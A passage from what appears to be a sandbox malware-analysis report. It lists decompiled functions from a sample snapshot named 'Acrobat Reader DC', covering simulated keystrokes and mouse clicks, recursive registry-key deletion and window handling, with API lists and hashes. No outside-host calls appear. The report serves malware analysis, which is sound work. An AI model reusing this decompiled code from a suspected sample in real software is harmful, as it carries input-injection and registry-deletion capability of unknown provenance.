				short _v20;
				intOrPtr _v24;
				signed int _v26;
				short _v28;
				char _v32;
				char _v288;
				signed int _t37;
				signed char _t50;
				signed char _t60;
				signed char _t70;
				signed int _t71;
				long _t74;
				void* _t76;

				_t60 = _a4;
				_t70 = _a8;
				_t37 =  *_t70;
				_t71 =  *(_t70 + 8) & 0x0000ffff;
				_a8 = _t37;
				_a4 =  *((intOrPtr*)(_t70 + 7));
				if( *(_t60 + 0x20) == 0 || _t37 == 0x14 || _t37 == 0x90 || _t37 == 0x91) {
					if(E0043487C(_t70) == 0) {
						_v32 = 1;
						_v28 = 0;
						_v26 = _t71;
						_v24 = 6;
						_v20 = 0;
						_v16 = 0;
						__imp__SendInput(1,  &_v32, 0x1c);
						goto L22;
					} else {
						if(E00444980(_t70) != 1) {
							E0043471D(_t60, _a8, _a4, 2);
							return E004347A9(_t60);
						} else {
							E0043471D(_t60, _a8, _a4, 3);
							return E004347A9(_t60);
						}
					}
				} else {
					if(E0043487C(_t70) == 0) {
						L22:
						return E004347A9(_t60);
					} else {
						if(GetKeyboardState( &_v288) != 0) {
							 *(_t76 + (_a8 & 0x000000ff) - 0x11c) =  *(_t76 + (_a8 & 0x000000ff) - 0x11c) ^ 0x00000080;
							SetKeyboardState( &_v288);
						}
						_t74 = (_a4 & 0x000000ff) << 0x00000010 | 0xc0000001;
						if(E00444980(_t70) == 1) {
							_t74 = _t74 | 0x01000000;
						}
						if( *((char*)(_t60 + 0x17)) != 0 ||  *((char*)(_t60 + 0x1d)) != 0) {
							_t50 = _a8;
							goto L14;
						} else {
							_t50 = _a8;
							if(_t50 == 0x12) {
								L14:
								if( *((char*)(_t60 + 0x16)) != 0 ||  *((char*)(_t60 + 0x1c)) != 0) {
									goto L12;
								} else {
									PostMessageW( *(_t60 + 0x20), 0x105, _t50 & 0x000000ff, _t74 | 0x20000000);
									return E004347A9(_t60);
								}
							} else {
								L12:
								PostMessageW( *(_t60 + 0x20), 0x101, _t50 & 0x000000ff, _t74);
								return E004347A9(_t60);
							}
						}
					}
				}
			}

















                                  0x0044c384
                                  0x0044c38d
                                  0x0044c390
                                  0x0044c395
                                  0x0044c399
                                  0x0044c39c
                                  0x0044c39f
                                  0x0044c48f
                                  0x0044c4e3
                                  0x0044c4ea
                                  0x0044c4ee
                                  0x0044c4f2
                                  0x0044c4f9
                                  0x0044c4fc
                                  0x0044c4ff
                                  0x00000000
                                  0x0044c491
                                  0x0044c499
                                  0x0044c4c5
                                  0x0044c4d6
                                  0x0044c49b
                                  0x0044c4a6
                                  0x0044c4b7
                                  0x0044c4b7
                                  0x0044c499
                                  0x0044c3bd
                                  0x0044c3c5
                                  0x0044c505
                                  0x0044c511
                                  0x0044c3cb
                                  0x0044c3da
                                  0x0044c3e0
                                  0x0044c3f6
                                  0x0044c3f6
                                  0x0044c404
                                  0x0044c411
                                  0x0044c413
                                  0x0044c413
                                  0x0044c41d
                                  0x0044c44f
                                  0x00000000
                                  0x0044c425
                                  0x0044c425
                                  0x0044c42a
                                  0x0044c452
                                  0x0044c456
                                  0x00000000
                                  0x0044c45e
                                  0x0044c472
                                  0x0044c484
                                  0x0044c484
                                  0x0044c42c
                                  0x0044c42c
                                  0x0044c43a
                                  0x0044c44c
                                  0x0044c44c
                                  0x0044c42a
                                  0x0044c41d
                                  0x0044c3c5

                                  APIs
                                  • GetKeyboardState.USER32(?), ref: 0044C3D2
                                  • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                  • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                  • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                  • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: KeyboardMessagePostState$InputSend
                                  • String ID:
                                  • API String ID: 3031425849-0
                                  • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                  • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                  • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                  • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00441C7B Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E00441C7B(void* _a4, signed int _a8) {
				int _v8;
				void* _v12;
				int _v16;
				int _v20;
				char _v28;
				struct _FILETIME _v36;
				short _v548;
				int _t29;
				void* _t33;
				void* _t35;
				long _t36;
				signed int _t57;
				void* _t58;
				void* _t59;

				_t58 = _a4;
				_v8 = 0xff;
				if(RegEnumKeyExW(_t58, 0,  &_v548,  &_v8, 0, 0, 0,  &_v36) == 0x103) {
					L10:
					return 1;
				} else {
					_t57 = _a8;
					_t29 = _t57 | 0x00020019;
					_v16 = _t29;
					while(RegOpenKeyExW(_t58,  &_v548, 0, _t29,  &_v12) == 0) {
						_t33 = E00441C7B(_v12, _t57);
						_t59 = _t59 + 8;
						RegCloseKey(_v12);
						if(_t33 == 0) {
							break;
						} else {
							_v28 = 0;
							_v20 = 0;
							_t35 = E00430CB1( &_v28);
							_t63 = _t35;
							if(_t35 == 0) {
								_t36 = RegDeleteKeyW(_t58,  &_v548);
							} else {
								_push(0);
								_push(_t57);
								_push( &_v548);
								_push(_t58);
								_t36 =  *((intOrPtr*)(E00441C58(_t63,  &_v28)))();
							}
							if(_t36 != 0) {
								E00430CCB( &_v28);
								break;
							} else {
								E00430CCB( &_v28);
								_v8 = 0xff;
								if(RegEnumKeyExW(_t58, 0,  &_v548,  &_v8, 0, 0, 0,  &_v36) != 0x103) {
									_t29 = _v16;
									continue;
								} else {
									goto L10;
								}
							}
						}
						goto L13;
					}
					__eflags = 0;
					return 0;
				}
				L13:
			}

















                                  0x00441c86
                                  0x00441ca2
                                  0x00441cb4
                                  0x00441d7f
                                  0x00441d87
                                  0x00441cba
                                  0x00441cba
                                  0x00441cbf
                                  0x00441cc4
                                  0x00441cce
                                  0x00441cf0
                                  0x00441cf8
                                  0x00441cfe
                                  0x00441d06
                                  0x00000000
                                  0x00441d0c
                                  0x00441d12
                                  0x00441d15
                                  0x00441d18
                                  0x00441d1d
                                  0x00441d1f
                                  0x00441d40
                                  0x00441d21
                                  0x00441d21
                                  0x00441d22
                                  0x00441d29
                                  0x00441d2a
                                  0x00441d34
                                  0x00441d34
                                  0x00441d48
                                  0x00441d8c
                                  0x00000000
                                  0x00441d4a
                                  0x00441d4e
                                  0x00441d67
                                  0x00441d79
                                  0x00441ccb
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00441d79
                                  0x00441d48
                                  0x00000000
                                  0x00441d06
                                  0x00441d93
                                  0x00441d99
                                  0x00441d99
                                  0x00000000

                                  APIs
                                  • RegEnumKeyExW.ADVAPI32 ref: 00441CA9
                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                  • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                  • RegEnumKeyExW.ADVAPI32 ref: 00441D6E
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Enum$CloseDeleteOpen
                                  • String ID:
                                  • API String ID: 2095303065-0
                                  • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                  • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                  • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                  • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 66%
                                  			E00436A0B(struct HWND__** _a4, intOrPtr _a8, intOrPtr _a12, int _a16, int _a20) {
				struct tagRECT _v20;
				intOrPtr _t28;
				struct HWND__* _t33;
				intOrPtr _t37;
				int _t47;
				intOrPtr _t51;
				int _t52;
				struct HWND__* _t54;
				signed short _t57;
				intOrPtr _t58;
				signed short _t63;
				long _t66;

				_t54 =  *_a4;
				_t63 = _a20;
				_t57 = _a16;
				GetWindowRect(_t54,  &_v20);
				if(_t57 == 0xffffffff) {
					asm("cdq");
					_t57 = _v20.right - _v20.left - _t54 >> 1;
				}
				if(_t63 == 0xffffffff) {
					asm("cdq");
					_t63 = _v20.bottom - _v20.top - _t54 >> 1;
				}
				_t66 = (_t63 & 0x0000ffff) << 0x00000010 | _t57 & 0x0000ffff;
				_t28 = _a8;
				_t51 = 1;
				_a16 = 0x201;
				_a20 = 0x203;
				_t47 = 0x202;
				_t58 = 1;
				if(_t28 != 2) {
					if(_t28 == 1) {
						_a16 = 0x207;
						_t47 = 0x208;
						_t58 = 0x10;
						goto L8;
					}
				} else {
					_a16 = 0x204;
					_t47 = 0x205;
					_t58 = _t28;
					L8:
					_a20 = 0x206;
				}
				_a8 = _t51;
				if(_a12 >= _t51) {
					while(1) {
						asm("cdq");
						_push(_t66);
						_t33 =  *_a4;
						_push(_t58);
						if((_t51 - _t54 >> 1) + (_t51 - _t54 >> 1) != _t51) {
							_t52 = _a16;
						} else {
							_t52 = _a20;
						}
						PostMessageW(_t33, _t52, ??, ??);
						Sleep(0);
						_t54 =  *_a4;
						PostMessageW(_t54, _t47, 0, _t66);
						Sleep(0);
						_t37 = _a8 + 1;
						_a8 = _t37;
						if(_t37 > _a12) {
							break;
						}
						_t51 = _a8;
					}
					return 1;
				} else {
					return _t51;
				}
			}















                                  0x00436a11
                                  0x00436a18
                                  0x00436a1c
                                  0x00436a24
                                  0x00436a2d
                                  0x00436a35
                                  0x00436a3a
                                  0x00436a3a
                                  0x00436a3f
                                  0x00436a47
                                  0x00436a4c
                                  0x00436a4c
                                  0x00436a57
                                  0x00436a59
                                  0x00436a5c
                                  0x00436a61
                                  0x00436a68
                                  0x00436a6f
                                  0x00436a74
                                  0x00436a79
                                  0x00436a8d
                                  0x00436a8f
                                  0x00436a96
                                  0x00436a9b
                                  0x00000000
                                  0x00436a9b
                                  0x00436a7b
                                  0x00436a7b
                                  0x00436a82
                                  0x00436a87
                                  0x00436aa0
                                  0x00436aa0
                                  0x00436aa0
                                  0x00436aa7
                                  0x00436aad
                                  0x00436abe
                                  0x00436ac0
                                  0x00436aca
                                  0x00436acd
                                  0x00436acf
                                  0x00436ad0
                                  0x00436ad7
                                  0x00436ad2
                                  0x00436ad2
                                  0x00436ad2
                                  0x00436adc
                                  0x00436ae4
                                  0x00436aed
                                  0x00436af4
                                  0x00436afc
                                  0x00436b05
                                  0x00436b06
                                  0x00436b0c
                                  0x00000000
                                  0x00000000
                                  0x00436abb
                                  0x00436abb
                                  0x00436b16
                                  0x00436aaf
                                  0x00436ab7
                                  0x00436ab7

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: RectWindow
                                  • String ID:
                                  • API String ID: 861336768-0
                                  • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                  • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                  • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                  • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004478AC(struct HWND__* _a4, signed int _a8, signed short _a12, signed short _a16) {
				struct tagPOINT _v12;
				void* _t24;
				signed int _t25;
				signed int _t26;
				intOrPtr _t31;
				int _t41;
				intOrPtr _t42;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr _t47;
				struct HWND__** _t56;
				struct HWND__* _t57;

				_t41 = _a8;
				_t57 = _a4;
				_t25 = E00430C09(_t24, 0x4a8630, _t57);
				_t42 =  *0x4a8690; // 0x0
				_t56 =  *( *(_t42 + _t25 * 4));
				if(_t41 != _t57) {
					_t26 = E00441B7C(0x4a8630, _t41);
					_a8 = _t26;
					if(_t26 == 0xffffffff) {
						goto L3;
					} else {
						_t44 =  *0x4a86a4; // 0xa71980
						_t45 =  *((intOrPtr*)( *((intOrPtr*)(_t44 + _t26 * 4))));
						_t31 =  *((intOrPtr*)(_t45 + 0x88));
						if(_t31 == 0xe || _t31 == 0xf || _t31 == 0x13 || _t31 == 0x10 ||  *((intOrPtr*)(_t45 + 8)) == 0) {
							goto L3;
						} else {
							GetCursorPos( &_v12);
							_t47 =  *0x4a86a4; // 0xa71980
							return TrackPopupMenuEx( *( *((intOrPtr*)( *((intOrPtr*)(_t47 + _a8 * 4)))) + 8), 0, _v12.x, _v12.y,  *_t56, 0);
						}
					}
				} else {
					if(_t56[0x69] == 0) {
						L3:
						return DefDlgProcW(_t57, 0x7b, _t41, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
					} else {
						GetCursorPos( &_v12);
						return TrackPopupMenuEx(_t56[0x69], 0, _v12, _v12.y, _t57, 0);
					}
				}
			}















                                  0x004478b3
                                  0x004478b7
                                  0x004478c1
                                  0x004478c6
                                  0x004478cf
                                  0x004478d3
                                  0x00447932
                                  0x00447937
                                  0x0044793d
                                  0x00000000
                                  0x0044793f
                                  0x0044793f
                                  0x00447948
                                  0x0044794a
                                  0x00447952
                                  0x00000000
                                  0x00447966
                                  0x0044796a
                                  0x0044797b
                                  0x0044799d
                                  0x0044799d
                                  0x00447952
                                  0x004478d5
                                  0x004478dc
                                  0x0044790b
                                  0x00447929
                                  0x004478de
                                  0x004478e2
                                  0x00447908
                                  0x00447908
                                  0x004478dc

                                  APIs
                                  • GetCursorPos.USER32(?), ref: 004478E2
                                  • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                  • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                  • GetCursorPos.USER32(00000000), ref: 0044796A
                                  • TrackPopupMenuEx.USER32(?,00000000,00000000,?,?,00000000), ref: 00447991
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CursorMenuPopupTrack$Proc
                                  • String ID:
                                  • API String ID: 1300944170-0
                                  • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                  • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                  • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                  • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 96%
                                  			E004479A0(struct HWND__* _a4, int _a8, signed short _a12, signed short _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagPOINT _v36;
				struct tagPOINT _v44;
				void* _t30;
				intOrPtr _t32;
				long _t38;
				intOrPtr _t43;
				struct HWND__* _t47;
				signed int _t48;
				intOrPtr _t53;
				intOrPtr _t61;
				intOrPtr _t66;
				struct HWND__* _t75;

				_t75 = _a4;
				_t71 = E00430C09(_t30, 0x4a8630, _t75);
				_t32 =  *0x4a8690; // 0x0
				_t53 =  *((intOrPtr*)( *((intOrPtr*)(_t32 + _t31 * 4))));
				GetClientRect(_t75,  &_v28);
				GetCursorPos( &_v36);
				_v44.x = _v36.x;
				_v44.y = _v36.y;
				ScreenToClient(_t75,  &_v44);
				_t38 = _v44.x;
				if(_t38 < _v28.left || _t38 > _v12) {
					L12:
					return DefDlgProcW(_t75, 0x20, _a8, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
				} else {
					_t43 = _v36.y;
					if(_t43 < _v28.bottom || _t43 > _v8) {
						goto L12;
					} else {
						if( *((char*)(_t53 + 0x16c)) == 0) {
							L11:
							_t66 =  *0x4a8690; // 0x0
							E00430737( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t66 + _t71 * 4)))) + 0x10)));
							if( *((intOrPtr*)(_t53 + 0x14)) != 0) {
								goto L10;
							} else {
								goto L12;
							}
						} else {
							_push(_v28.top);
							_t47 = WindowFromPoint(_v28);
							if(_t47 == 0 || _t47 == _t75) {
								goto L11;
							} else {
								_t48 = E00441B7C(0x4a8630, _t47);
								if(_t48 == 0xffffffff) {
									goto L11;
								} else {
									_t61 =  *0x4a86a4; // 0xa71980
									_t50 =  *( *((intOrPtr*)( *((intOrPtr*)(_t61 + _t48 * 4)))) + 0x7c) & 0x0000ffff;
									if(( *( *((intOrPtr*)( *((intOrPtr*)(_t61 + _t48 * 4)))) + 0x7c) & 0x0000ffff) == 0xffff) {
										goto L11;
									} else {
										E00430737(_t50);
										L10:
										return 1;
									}
								}
							}
						}
					}
				}
			}


















                                  0x004479ab
                                  0x004479ba
                                  0x004479bc
                                  0x004479c4
                                  0x004479cc
                                  0x004479d7
                                  0x004479eb
                                  0x004479ef
                                  0x004479f3
                                  0x004479f9
                                  0x00447a01
                                  0x00447a98
                                  0x00447ab9
                                  0x00447a11
                                  0x00447a11
                                  0x00447a19
                                  0x00000000
                                  0x00447a21
                                  0x00447a28
                                  0x00447a7e
                                  0x00447a7e
                                  0x00447a8d
                                  0x00447a96
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00447a2a
                                  0x00447a32
                                  0x00447a34
                                  0x00447a3c
                                  0x00000000
                                  0x00447a42
                                  0x00447a48
                                  0x00447a50
                                  0x00000000
                                  0x00447a52
                                  0x00447a52
                                  0x00447a5d
                                  0x00447a65
                                  0x00000000
                                  0x00447a67
                                  0x00447a6b
                                  0x00447a70
                                  0x00447a7b
                                  0x00447a7b
                                  0x00447a65
                                  0x00447a50
                                  0x00447a3c
                                  0x00447a28
                                  0x00447a19

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Client$CursorFromPointProcRectScreenWindow
                                  • String ID:
                                  • API String ID: 1822080540-0
                                  • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                  • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                  • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                  • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E00445870(void* __ebx, intOrPtr _a4, struct HWND__* _a8) {
				void* __edi;
				void* __esi;
				WCHAR* _t22;
				long _t24;
				intOrPtr _t26;
				long _t31;
				void* _t34;
				int _t35;
				signed int _t44;
				intOrPtr _t45;
				struct HWND__* _t46;
				WCHAR* _t47;
				void* _t48;
				void* _t49;
				signed int _t54;

				_t34 = __ebx;
				_t46 = _a8;
				if(IsWindowVisible(_t46) != 0 ||  *((char*)(_a4 + 5)) == 1) {
					_t44 = SendMessageW(_t46, 0xe, 0, 0);
					_t54 = _t44;
					if(_t54 == 0) {
						_t44 = 0x7fff;
					}
					_push(_t34);
					_t4 = _t44 + 1; // 0x1
					_t35 = _t4;
					_push( ~(0 | _t54 > 0x00000000) | _t35 * 0x00000002);
					_t22 = E004115D7(_t44, _t46, _t54);
					_t49 = _t48 + 4;
					_t47 = _t22;
					_t24 = SendMessageW(_a8, 0xd, _t35, _t47);
					_t47[_t44] = 0;
					if(_t24 > 0) {
						_t45 = _a4;
						__eflags =  *((intOrPtr*)(_t45 + 0xc));
						if( *((intOrPtr*)(_t45 + 0xc)) == 0) {
							_t31 = E004111C1(_t47);
							_t49 = _t49 + 4;
							CharUpperBuffW(_t47, _t31);
						}
						_t26 = E004134BD(_t47,  *((intOrPtr*)(_t45 + 0x24)));
						_t49 = _t49 + 8;
						_push(_t47);
						__eflags = _t26;
						if(_t26 == 0) {
							goto L6;
						} else {
							 *((char*)(_t45 + 0xe8)) = 1;
							E004111DC();
							__eflags = 0;
							return 0;
						}
					} else {
						_push(_t47);
						L6:
						E004111DC();
						goto L7;
					}
				} else {
					L7:
					return 1;
				}
			}


















                                  0x00445870
                                  0x00445874
                                  0x00445881
                                  0x00445899
                                  0x0044589b
                                  0x0044589d
                                  0x0044589f
                                  0x0044589f
                                  0x004458a4
                                  0x004458a7
                                  0x004458a7
                                  0x004458ba
                                  0x004458bb
                                  0x004458c0
                                  0x004458c3
                                  0x004458cd
                                  0x004458d5
                                  0x004458dc
                                  0x004458f2
                                  0x004458f5
                                  0x004458f8
                                  0x004458fb
                                  0x00445900
                                  0x00445905
                                  0x00445905
                                  0x00445910
                                  0x00445915
                                  0x00445918
                                  0x00445919
                                  0x0044591b
                                  0x00000000
                                  0x0044591d
                                  0x0044591d
                                  0x00445924
                                  0x0044592d
                                  0x00445931
                                  0x00445931
                                  0x004458de
                                  0x004458de
                                  0x004458df
                                  0x004458df
                                  0x00000000
                                  0x004458e4
                                  0x004458e8
                                  0x004458e8
                                  0x004458ef
                                  0x004458ef

                                  APIs
                                  • IsWindowVisible.USER32 ref: 00445879
                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                  • _wcslen.LIBCMT ref: 004458FB
                                  • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                  • String ID:
                                  • API String ID: 3087257052-0
                                  • Opcode ID: 40d03142f7c4b893e7ee3f174c8354c03563b4f575d30d0b3a1bb9a9e66914fb
                                  • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                  • Opcode Fuzzy Hash: 40d03142f7c4b893e7ee3f174c8354c03563b4f575d30d0b3a1bb9a9e66914fb
                                  • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0044719B(struct HDC__* _a4, intOrPtr _a8, intOrPtr _a12, long _a16, long _a20) {
				struct tagLOGBRUSH _v16;
				intOrPtr _t11;
				void* _t14;
				void* _t17;
				long _t21;
				void* _t22;
				long _t23;
				intOrPtr _t24;
				struct HDC__* _t25;
				void* _t27;
				void* _t28;
				void* _t29;

				_t21 = _a16;
				_t24 = _a8;
				_t23 = _a20;
				if(_t24 == 0xffffffff) {
					L10:
					_t25 = _a4;
					L11:
					_t11 = _a12;
					if(_t11 == 0xffffffff) {
						L14:
						return _t11;
					}
					_t35 = _t11 - 0xfffffffe;
